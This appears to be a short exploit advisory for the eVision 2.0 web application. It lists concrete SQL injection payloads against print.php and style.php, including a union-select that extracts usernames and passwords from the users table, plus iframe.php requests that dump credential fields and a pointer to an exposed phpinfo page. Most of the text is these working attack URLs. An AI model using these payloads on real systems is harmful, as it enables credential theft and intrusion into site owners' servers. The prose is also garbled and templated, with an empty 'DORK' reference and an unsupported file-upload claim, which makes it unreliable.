eVision 2.0 Sql Injection/Remote File Upload/IG
A vulnerability exists in eVision 2.0 which allows an attacker to perform Sql Injection/Remote File Upload/IG. The attacker can exploit this vulnerability by sending malicious requests to the vulnerable application. The vulnerable application is hosted on http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz. The attacker can use the DORK :( to find vulnerable sites. The attacker can use the Blind injection http://Site/print.php?id=1'+and+1=1/* and http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/* to get the username and password. The attacker can use the User http://Site/iframe.php?field=username&module=users/* and Pass http://Site/iframe.php?field=pass&module=users/* to get the username and password. The attacker can also use the http://Site/admin/phpinfo.php to get the information about the server.